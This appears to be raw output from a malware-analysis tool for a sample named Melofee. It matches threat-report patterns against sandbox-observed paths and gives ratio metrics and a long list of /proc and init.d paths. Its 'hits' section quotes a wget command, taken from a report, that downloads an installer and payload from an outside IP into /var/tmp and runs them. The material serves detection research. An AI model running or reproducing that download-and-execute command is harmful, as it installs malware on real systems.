asg_object: ['.*/man/.*', '.*/selinux', '/.*bin/ls', '/.*bin/ping', '/etc/init\\.d/.*', '/proc/\\d+/exe', '/proc/self', '/var/tmp/.*', '0x[0-9a-zA-Z]{1,16}', 'Permission', 'Permission:[0-9]{3}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d+', '^GID.*', '^PID.*', '^UID.*', '^sh$', 'port \\d+']

Sample Melofee.csv
	num of segment in report: 28, 6 of them contain ASG object(s)
	lenght of ctd's OPset is 9
	#numofSTobject: 7, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 5, num of asg objects: 859. R_malObj is 0.0058
		ctd_object: ['/var/tmp/.*', '0x[0-9a-zA-Z]{1,16}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d+', '^UID.*', '^sh$']
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 49. R_malSysObj is 0.0000
		len(asg_OPset): 48, len(ctd_OPset): 9
	#R_malOps
	num of matched asg op: 1, num of asg op: 1112. R_malOps is 0.0009
		refered lifecycle: [27, 28]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 47. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

	hits
	<OP28 act=send(), obj=ip_addr/ip_addr:port/port>, <OP 2 act=wget, obj=http://173.209.62.186:8765/installer, sent=wget http://173.209.62.186:8765/installer -O /var/tmp/installer wget http://173.209.62.186:8765/a.dat -O /var/tmp/usbd; chmod +x /var/tmp/installer; /var/tmp/installer -i /var/tmp/usbd The installer is also developped in C++, and takes the binary package as an argument>
	<OP29 act=send(), obj=ip_addr/ip_addr:port/port>, <OP 3 act=wget, obj=http://173.209.62.186:8765/installer, sent=wget http://173.209.62.186:8765/installer -O /var/tmp/installer wget http://173.209.62.186:8765/a.dat -O /var/tmp/usbd; chmod +x /var/tmp/installer; /var/tmp/installer -i /var/tmp/usbd The installer is also developped in C++, and takes the binary package as an argument>


OperationPair that changes system resources:
[<OP13 act=write(), obj=.*/selinux>, <OP39 act=write(), obj=/etc/init\.d/.*>, <OP45 act=write(), obj=ip_addr/ip_addr:port/port>, <OP44 act=write(), obj=ip_addr/ip_addr:port/port>]

{
    ".*/man/.*": [
        "/usr/local/share/man/man1/configs.conf"
    ],
    ".*/selinux": [
        "/etc/selinux/configs.conf"
    ],
    "/.*bin/ls": [
        "/bin/ls"
    ],
    "/.*bin/ping": [
        "/bin/ping"
    ],
    "/etc/init\\.d/.*": [
        "/etc/init.d/",
        "/etc/init.d/.",
        "/etc/init.d/..",
        "/etc/init.d/acpid",
        "/etc/init.d/alsa-utils",
        "/etc/init.d/anacron",
        "/etc/init.d/apparmor",
        "/etc/init.d/apport",
        "/etc/init.d/auditd",
        "/etc/init.d/avahi-daemon",
        "/etc/init.d/binfmt-support",
        "/etc/init.d/bluetooth",
        "/etc/init.d/console-setup.sh",
        "/etc/init.d/cron",
        "/etc/init.d/cups",
        "/etc/init.d/cups-browsed",
        "/etc/init.d/dbus",
        "/etc/init.d/dns-clean",
        "/etc/init.d/ebtables",
        "/etc/init.d/gdm3",
        "/etc/init.d/grub-common",
        "/etc/init.d/hwclock.sh",
        "/etc/init.d/inetsim",
        "/etc/init.d/irqbalance",
        "/etc/init.d/kerneloops",
        "/etc/init.d/keyboard-setup.sh",
        "/etc/init.d/kmod",
        "/etc/init.d/lvm2",
        "/etc/init.d/lvm2-lvmetad",
        "/etc/init.d/lvm2-lvmpolld",
        "/etc/init.d/network-manager",
        "/etc/init.d/networking",
        "/etc/init.d/plymouth",
        "/etc/init.d/plymouth-log",
        "/etc/init.d/pppd-dns",
        "/etc/init.d/procps",
        "/etc/init.d/rsync",
        "/etc/init.d/rsyslog",
        "/etc/init.d/saned",
        "/etc/init.d/speech-dispatcher",
        "/etc/init.d/spice-vdagent",
        "/etc/init.d/udev",
        "/etc/init.d/ufw",
        "/etc/init.d/unattended-upgrades",
        "/etc/init.d/uuidd",
        "/etc/init.d/virtlogd",
        "/etc/init.d/virtualbox-guest-utils",
        "/etc/init.d/whoopsie",
        "/etc/init.d/x11-common"
    ],
    "/proc/\\d+/exe": [
        "/proc/0/exe",
        "/proc/1/exe",
        "/proc/10/exe",
        "/proc/100/exe",
        "/proc/101/exe",
        "/proc/102/exe",
        "/proc/103/exe",
        "/proc/104/exe",
        "/proc/105/exe",
        "/proc/106/exe",
        "/proc/107/exe",
        "/proc/108/exe",
        "/proc/109/exe",
        "/proc/11/exe",
        "/proc/110/exe",
        "/proc/111/exe",
        "/proc/112/exe",
        "/proc/113/exe",
        "/proc/114/exe",
        "/proc/115/exe",
        "/proc/116/exe",
        "/proc/117/exe",
        "/proc/118/exe",
        "/proc/119/exe",
        "/proc/12/exe",
        "/proc/120/exe",
        "/proc/121/exe",
        "/proc/122/exe",
        "/proc/123/exe",
        "/proc/124/exe",
        "/proc/125/exe",
        "/proc/126/exe",
        "/proc/127/exe",
        "/proc/128/exe",
        "/proc/129/exe",
        "/proc/13/exe",
        "/proc/130/exe",
        "/proc/131/exe",
        "/proc/132/exe",
        "/proc/133/exe",
        "/proc/134/exe",
        "/proc/135/exe",
        "/proc/136/exe",
        "/proc/137/exe",
        "/proc/138/exe",
        "/proc/139/exe",
        "/proc/14/exe",
        "/proc/140/exe",
        "/proc/141/exe",
        "/proc/142/exe",
        "/proc/143/exe",
        "/proc/144/exe",
        "/proc/145/exe",
        "/proc/146/exe",
        "/proc/147/exe",
        "/proc/148/exe",
        "/proc/149/exe",
        "/proc/15/exe",
        "/proc/150/exe",
        "/proc/151/exe",
        "/proc/1518/exe",
        "/proc/152/exe",
        "/proc/1521/exe",
        "/proc/1524/exe",
        "/proc/153/exe",
        "/proc/154/exe",
        "/proc/155/exe",
        "/proc/156/exe",
        "/proc/157/exe",
        "/proc/158/exe",
        "/proc/159/exe",
        "/proc/16/exe",
        "/proc/160/exe",
        "/proc/161/exe",
        "/proc/162/exe",
        "/proc/163/exe",
        "/proc/164/exe",
        "/proc/165/exe",
        "/proc/166/exe",
        "/proc/167/exe",
        "/proc/168/exe",
        "/proc/169/exe",
        "/proc/17/exe",
        "/proc/170/exe",
        "/proc/171/exe",
        "/proc/172/exe",
        "/proc/173/exe",
        "/proc/174/exe",
        "/proc/175/exe",
        "/proc/176/exe",
        "/proc/177/exe",
        "/proc/178/exe",
        "/proc/179/exe",
        "/proc/18/exe",
        "/proc/180/exe",
        "/proc/181/exe",
        "/proc/182/exe",
        "/proc/183/exe",
        "/proc/184/exe",
        "/proc/185/exe",
        "/proc/186/exe",
        "/proc/187/exe",
        "/proc/188/exe",
        "/proc/189/exe",
        "/proc/19/exe",
        "/proc/190/exe",
        "/proc/191/exe",
        "/proc/192/exe",
        "/proc/193/exe",
        "/proc/194/exe",
        "/proc/195/exe",
        "/proc/196/exe",
        "/proc/197/exe",
        "/proc/198/exe",
        "/proc/199/exe",
        "/proc/2/exe",
        "/proc/20/exe",
        "/proc/200/exe",
        "/proc/201/exe",
        "/proc/202/exe",
        "/proc/203/exe",
        "/proc/204/exe",
        "/proc/205/exe",
        "/proc/206/exe",
        "/proc/207/exe",
        "/proc/208/exe",
        "/proc/209/exe",
        "/proc/21/exe",
        "/proc/210/exe",
        "/proc/211/exe",
        "/proc/212/exe",
        "/proc/213/exe",
        "/proc/214/exe",
        "/proc/215/exe",
        "/proc/216/exe",
        "/proc/217/exe",
        "/proc/218/exe",
        "/proc/219/exe",
        "/proc/22/exe",
        "/proc/220/exe",
        "/proc/221/exe",
        "/proc/222/exe",
        "/proc/223/exe",
        "/proc/224/exe",
        "/proc/225/exe",
        "/proc/226/exe",
        "/proc/227/exe",
        "/proc/228/exe",
        "/proc/229/exe",
        "/proc/23/exe",
        "/proc/230/exe",
        "/proc/231/exe",
        "/proc/232/exe",
        "/proc/233/exe",
        "/proc/234/exe",
        "/proc/235/exe",
        "/proc/236/exe",
        "/proc/237/exe",
        "/proc/238/exe",
        "/proc/239/exe",
        "/proc/24/exe",
        "/proc/240/exe",
        "/proc/241/exe",
        "/proc/242/exe",
        "/proc/243/exe",
        "/proc/244/exe",
        "/proc/245/exe",
        "/proc/246/exe",
        "/proc/247/exe",
        "/proc/248/exe",
        "/proc/249/exe",
        "/proc/25/exe",
        "/proc/250/exe",
        "/proc/251/exe",
        "/proc/252/exe",
        "/proc/253/exe",
        "/proc/254/exe",
        "/proc/255/exe",
        "/proc/256/exe",
        "/proc/257/exe",
        "/proc/258/exe",
        "/proc/259/exe",
        "/proc/26/exe",
        "/proc/260/exe",
        "/proc/261/exe",
        "/proc/262/exe",
        "/proc/263/exe",
        "/proc/264/exe",
        "/proc/265/exe",
        "/proc/266/exe",
        "/proc/267/exe",
        "/proc/268/exe",
        "/proc/269/exe",
        "/proc/27/exe",
        "/proc/270/exe",
        "/proc/271/exe",
        "/proc/272/exe",
        "/proc/273/exe",
        "/proc/274/exe",
        "/proc/275/exe",
        "/proc/276/exe",
        "/proc/277/exe",
        "/proc/278/exe",
        "/proc/279/exe",
        "/proc/28/exe",
        "/proc/280/exe",
        "/proc/281/exe",
        "/proc/282/exe",
        "/proc/283/exe",
        "/proc/284/exe",
        "/proc/285/exe",
        "/proc/286/exe",
        "/proc/287/exe",
        "/proc/288/exe",
        "/proc/289/exe",
        "/proc/29/exe",
        "/proc/290/exe",
        "/proc/291/exe",
        "/proc/292/exe",
        "/proc/293/exe",
        "/proc/294/exe",
        "/proc/295/exe",
        "/proc/296/exe",
        "/proc/297/exe",
        "/proc/298/exe",
        "/proc/299/exe",
        "/proc/3/exe",
        "/proc/30/exe",
        "/proc/300/exe",
        "/proc/301/exe",
        "/proc/302/exe",
        "/proc/303/exe",
        "/proc/304/exe",
        "/proc/305/exe",
        "/proc/306/exe",
        "/proc/307/exe",
        "/proc/308/exe",
        "/proc/309/exe",
        "/proc/31/exe",
        "/proc/310/exe",
        "/proc/311/exe",
        "/proc/312/exe",
        "/proc/313/exe",
        "/proc/314/exe",
        "/proc/315/exe",
        "/proc/316/exe",
        "/proc/317/exe",
        "/proc/318/exe",
        "/proc/319/exe",
        "/proc/32/exe",
        "/proc/320/exe",
        "/proc/321/exe",
        "/proc/322/exe",
        "/proc/323/exe",
        "/proc/324/exe",
        "/proc/325/exe",
        "/proc/326/exe",
        "/proc/327/exe",
        "/proc/328/exe",
        "/proc/329/exe",
        "/proc/33/exe",
        "/proc/330/exe",
        "/proc/331/exe",
        "/proc/332/exe",
        "/proc/333/exe",
        "/proc/334/exe",
        "/proc/335/exe",
        "/proc/336/exe",
        "/proc/337/exe",
        "/proc/338/exe",
        "/proc/339/exe",
        "/proc/34/exe",
        "/proc/340/exe",
        "/proc/341/exe",
        "/proc/342/exe",
        "/proc/343/exe",
        "/proc/344/exe",
        "/proc/345/exe",
        "/proc/346/exe",
        "/proc/347/exe",
        "/proc/348/exe",
        "/proc/349/exe",
        "/proc/35/exe",
        "/proc/350/exe",
        "/proc/351/exe",
        "/proc/352/exe",
        "/proc/353/exe",
        "/proc/354/exe",
        "/proc/355/exe",
        "/proc/356/exe",
        "/proc/357/exe",
        "/proc/358/exe",
        "/proc/359/exe",
        "/proc/36/exe",
        "/proc/360/exe",
        "/proc/361/exe",
        "/proc/362/exe",
        "/proc/363/exe",
        "/proc/364/exe",
        "/proc/365/exe",
        "/proc/366/exe",
        "/proc/367/exe",
        "/proc/368/exe",
        "/proc/369/exe",
        "/proc/37/exe",
        "/proc/370/exe",
        "/proc/371/exe",
        "/proc/372/exe",
        "/proc/373/exe",
        "/proc/374/exe",
        "/proc/375/exe",
        "/proc/376/exe",
        "/proc/377/exe",
        "/proc/378/exe",
        "/proc/379/exe",
        "/proc/38/exe",
        "/proc/380/exe",
        "/proc/381/exe",
        "/proc/382/exe",
        "/proc/383/exe",
        "/proc/384/exe",
        "/proc/385/exe",
        "/proc/386/exe",
        "/proc/387/exe",
        "/proc/388/exe",
        "/proc/389/exe",
        "/proc/39/exe",
        "/proc/390/exe",
        "/proc/391/exe",
        "/proc/392/exe",
        "/proc/393/exe",
        "/proc/394/exe",
        "/proc/395/exe",
        "/proc/396/exe",
        "/proc/397/exe",
        "/proc/398/exe",
        "/proc/399/exe",
        "/proc/4/exe",
        "/proc/40/exe",
        "/proc/400/exe",
        "/proc/401/exe",
        "/proc/402/exe",
        "/proc/403/exe",
        "/proc/404/exe",
        "/proc/405/exe",
        "/proc/406/exe",
        "/proc/407/exe",
        "/proc/408/exe",
        "/proc/409/exe",
        "/proc/41/exe",
        "/proc/410/exe",
        "/proc/411/exe",
        "/proc/412/exe",
        "/proc/413/exe",
        "/proc/414/exe",
        "/proc/415/exe",
        "/proc/416/exe",
        "/proc/417/exe",
        "/proc/418/exe",
        "/proc/419/exe",
        "/proc/42/exe",
        "/proc/420/exe",
        "/proc/421/exe",
        "/proc/422/exe",
        "/proc/423/exe",
        "/proc/424/exe",
        "/proc/425/exe",
        "/proc/426/exe",
        "/proc/427/exe",
        "/proc/428/exe",
        "/proc/429/exe",
        "/proc/43/exe",
        "/proc/430/exe",
        "/proc/431/exe",
        "/proc/432/exe",
        "/proc/433/exe",
        "/proc/434/exe",
        "/proc/435/exe",
        "/proc/436/exe",
        "/proc/437/exe",
        "/proc/438/exe",
        "/proc/439/exe",
        "/proc/44/exe",
        "/proc/440/exe",
        "/proc/441/exe",
        "/proc/442/exe",
        "/proc/443/exe",
        "/proc/444/exe",
        "/proc/445/exe",
        "/proc/446/exe",
        "/proc/447/exe",
        "/proc/448/exe",
        "/proc/449/exe",
        "/proc/45/exe",
        "/proc/450/exe",
        "/proc/451/exe",
        "/proc/452/exe",
        "/proc/453/exe",
        "/proc/454/exe",
        "/proc/455/exe",
        "/proc/456/exe",
        "/proc/457/exe",
        "/proc/458/exe",
        "/proc/459/exe",
        "/proc/46/exe",
        "/proc/460/exe",
        "/proc/461/exe",
        "/proc/462/exe",
        "/proc/463/exe",
        "/proc/464/exe",
        "/proc/465/exe",
        "/proc/466/exe",
        "/proc/467/exe",
        "/proc/468/exe",
        "/proc/469/exe",
        "/proc/47/exe",
        "/proc/470/exe",
        "/proc/471/exe",
        "/proc/472/exe",
        "/proc/473/exe",
        "/proc/474/exe",
        "/proc/475/exe",
        "/proc/476/exe",
        "/proc/477/exe",
        "/proc/478/exe",
        "/proc/479/exe",
        "/proc/48/exe",
        "/proc/480/exe",
        "/proc/481/exe",
        "/proc/482/exe",
        "/proc/483/exe",
        "/proc/484/exe",
        "/proc/485/exe",
        "/proc/486/exe",
        "/proc/487/exe",
        "/proc/488/exe",
        "/proc/489/exe",
        "/proc/49/exe",
        "/proc/490/exe",
        "/proc/491/exe",
        "/proc/492/exe",
        "/proc/493/exe",
        "/proc/494/exe",
        "/proc/495/exe",
        "/proc/496/exe",
        "/proc/497/exe",
        "/proc/498/exe",
        "/proc/499/exe",
        "/proc/5/exe",
        "/proc/50/exe",
        "/proc/500/exe",
        "/proc/501/exe",
        "/proc/502/exe",
        "/proc/503/exe",
        "/proc/504/exe",
        "/proc/505/exe",
        "/proc/506/exe",
        "/proc/507/exe",
        "/proc/508/exe",
        "/proc/509/exe",
        "/proc/51/exe",
        "/proc/510/exe",
        "/proc/511/exe",
        "/proc/512/exe",
        "/proc/513/exe",
        "/proc/514/exe",
        "/proc/515/exe",
        "/proc/516/exe",
        "/proc/517/exe",
        "/proc/518/exe",
        "/proc/519/exe",
        "/proc/52/exe",
        "/proc/520/exe",
        "/proc/521/exe",
        "/proc/522/exe",
        "/proc/523/exe",
        "/proc/524/exe",
        "/proc/525/exe",
        "/proc/526/exe",
        "/proc/527/exe",
        "/proc/528/exe",
        "/proc/529/exe",
        "/proc/53/exe",
        "/proc/530/exe",
        "/proc/531/exe",
        "/proc/532/exe",
        "/proc/533/exe",
        "/proc/534/exe",
        "/proc/535/exe",
        "/proc/536/exe",
        "/proc/537/exe",
        "/proc/538/exe",
        "/proc/539/exe",
        "/proc/54/exe",
        "/proc/540/exe",
        "/proc/541/exe",
        "/proc/542/exe",
        "/proc/543/exe",
        "/proc/544/exe",
        "/proc/545/exe",
        "/proc/546/exe",
        "/proc/547/exe",
        "/proc/548/exe",
        "/proc/549/exe",
        "/proc/55/exe",
        "/proc/550/exe",
        "/proc/551/exe",
        "/proc/552/exe",
        "/proc/553/exe",
        "/proc/554/exe",
        "/proc/555/exe",
        "/proc/556/exe",
        "/proc/557/exe",
        "/proc/558/exe",
        "/proc/559/exe",
        "/proc/56/exe",
        "/proc/560/exe",
        "/proc/561/exe",
        "/proc/562/exe",
        "/proc/563/exe",
        "/proc/564/exe",
        "/proc/565/exe",
        "/proc/566/exe",
        "/proc/567/exe",
        "/proc/568/exe",
        "/proc/569/exe",
        "/proc/57/exe",
        "/proc/570/exe",
        "/proc/571/exe",
        "/proc/572/exe",
        "/proc/573/exe",
        "/proc/574/exe",
        "/proc/575/exe",
        "/proc/576/exe",
        "/proc/577/exe",
        "/proc/578/exe",
        "/proc/579/exe",
        "/proc/58/exe",
        "/proc/580/exe",
        "/proc/581/exe",
        "/proc/582/exe",
        "/proc/583/exe",
        "/proc/584/exe",
        "/proc/585/exe",
        "/proc/586/exe",
        "/proc/587/exe",
        "/proc/588/exe",
        "/proc/589/exe",
        "/proc/59/exe",
        "/proc/590/exe",
        "/proc/591/exe",
        "/proc/592/exe",
        "/proc/593/exe",
        "/proc/594/exe",
        "/proc/595/exe",
        "/proc/596/exe",
        "/proc/597/exe",
        "/proc/598/exe",
        "/proc/599/exe",
        "/proc/6/exe",
        "/proc/60/exe",
        "/proc/600/exe",
        "/proc/601/exe",
        "/proc/602/exe",
        "/proc/603/exe",
        "/proc/604/exe",
        "/proc/605/exe",
        "/proc/606/exe",
        "/proc/607/exe",
        "/proc/608/exe",
        "/proc/609/exe",
        "/proc/61/exe",
        "/proc/610/exe",
        "/proc/611/exe",
        "/proc/612/exe",
        "/proc/613/exe",
        "/proc/614/exe",
        "/proc/615/exe",
        "/proc/616/exe",
        "/proc/617/exe",
        "/proc/618/exe",
        "/proc/619/exe",
        "/proc/62/exe",
        "/proc/620/exe",
        "/proc/621/exe",
        "/proc/622/exe",
        "/proc/623/exe",
        "/proc/624/exe",
        "/proc/625/exe",
        "/proc/626/exe",
        "/proc/627/exe",
        "/proc/628/exe",
        "/proc/629/exe",
        "/proc/63/exe",
        "/proc/630/exe",
        "/proc/631/exe",
        "/proc/632/exe",
        "/proc/633/exe",
        "/proc/634/exe",
        "/proc/635/exe",
        "/proc/636/exe",
        "/proc/637/exe",
        "/proc/638/exe",
        "/proc/639/exe",
        "/proc/64/exe",
        "/proc/640/exe",
        "/proc/641/exe",
        "/proc/642/exe",
        "/proc/643/exe",
        "/proc/644/exe",
        "/proc/645/exe",
        "/proc/646/exe",
        "/proc/647/exe",
        "/proc/648/exe",
        "/proc/649/exe",
        "/proc/65/exe",
        "/proc/650/exe",
        "/proc/651/exe",
        "/proc/652/exe",
        "/proc/653/exe",
        "/proc/654/exe",
        "/proc/655/exe",
        "/proc/656/exe",
        "/proc/657/exe",
        "/proc/658/exe",
        "/proc/659/exe",
        "/proc/66/exe",
        "/proc/660/exe",
        "/proc/661/exe",
        "/proc/662/exe",
        "/proc/663/exe",
        "/proc/664/exe",
        "/proc/665/exe",
        "/proc/666/exe",
        "/proc/667/exe",
        "/proc/668/exe",
        "/proc/669/exe",
        "/proc/67/exe",
        "/proc/670/exe",
        "/proc/671/exe",
        "/proc/672/exe",
        "/proc/673/exe",
        "/proc/674/exe",
        "/proc/675/exe",
        "/proc/676/exe",
        "/proc/677/exe",
        "/proc/678/exe",
        "/proc/679/exe",
        "/proc/68/exe",
        "/proc/680/exe",
        "/proc/681/exe",
        "/proc/682/exe",
        "/proc/683/exe",
        "/proc/684/exe",
        "/proc/685/exe",
        "/proc/686/exe",
        "/proc/687/exe",
        "/proc/688/exe",
        "/proc/689/exe",
        "/proc/69/exe",
        "/proc/690/exe",
        "/proc/691/exe",
        "/proc/692/exe",
        "/proc/693/exe",
        "/proc/694/exe",
        "/proc/695/exe",
        "/proc/696/exe",
        "/proc/697/exe",
        "/proc/698/exe",
        "/proc/699/exe",
        "/proc/7/exe",
        "/proc/70/exe",
        "/proc/700/exe",
        "/proc/701/exe",
        "/proc/702/exe",
        "/proc/703/exe",
        "/proc/704/exe",
        "/proc/705/exe",
        "/proc/706/exe",
        "/proc/707/exe",
        "/proc/708/exe",
        "/proc/709/exe",
        "/proc/71/exe",
        "/proc/710/exe",
        "/proc/711/exe",
        "/proc/712/exe",
        "/proc/713/exe",
        "/proc/714/exe",
        "/proc/715/exe",
        "/proc/716/exe",
        "/proc/717/exe",
        "/proc/718/exe",
        "/proc/719/exe",
        "/proc/72/exe",
        "/proc/720/exe",
        "/proc/721/exe",
        "/proc/722/exe",
        "/proc/723/exe",
        "/proc/724/exe",
        "/proc/725/exe",
        "/proc/726/exe",
        "/proc/727/exe",
        "/proc/728/exe",
        "/proc/729/exe",
        "/proc/73/exe",
        "/proc/730/exe",
        "/proc/731/exe",
        "/proc/732/exe",
        "/proc/733/exe",
        "/proc/734/exe",
        "/proc/735/exe",
        "/proc/736/exe",
        "/proc/737/exe",
        "/proc/738/exe",
        "/proc/739/exe",
        "/proc/74/exe",
        "/proc/740/exe",
        "/proc/741/exe",
        "/proc/742/exe",
        "/proc/743/exe",
        "/proc/744/exe",
        "/proc/745/exe",
        "/proc/746/exe",
        "/proc/747/exe",
        "/proc/748/exe",
        "/proc/749/exe",
        "/proc/75/exe",
        "/proc/750/exe",
        "/proc/751/exe",
        "/proc/752/exe",
        "/proc/753/exe",
        "/proc/754/exe",
        "/proc/755/exe",
        "/proc/756/exe",
        "/proc/757/exe",
        "/proc/758/exe",
        "/proc/759/exe",
        "/proc/76/exe",
        "/proc/760/exe",
        "/proc/761/exe",
        "/proc/762/exe",
        "/proc/763/exe",
        "/proc/764/exe",
        "/proc/765/exe",
        "/proc/766/exe",
        "/proc/767/exe",
        "/proc/768/exe",
        "/proc/769/exe",
        "/proc/77/exe",
        "/proc/78/exe",
        "/proc/79/exe",
        "/proc/8/exe",
        "/proc/80/exe",
        "/proc/81/exe",
        "/proc/82/exe",
        "/proc/83/exe",
        "/proc/84/exe",
        "/proc/85/exe",
        "/proc/86/exe",
        "/proc/87/exe",
        "/proc/88/exe",
        "/proc/89/exe",
        "/proc/9/exe",
        "/proc/90/exe",
        "/proc/91/exe",
        "/proc/92/exe",
        "/proc/93/exe",
        "/proc/94/exe",
        "/proc/95/exe",
        "/proc/96/exe",
        "/proc/97/exe",
        "/proc/98/exe",
        "/proc/99/exe"
    ],
    "/proc/self": [
        "/proc/self/exe"
    ],
    "/var/tmp/.*": [
        "/var/tmp/"
    ]
}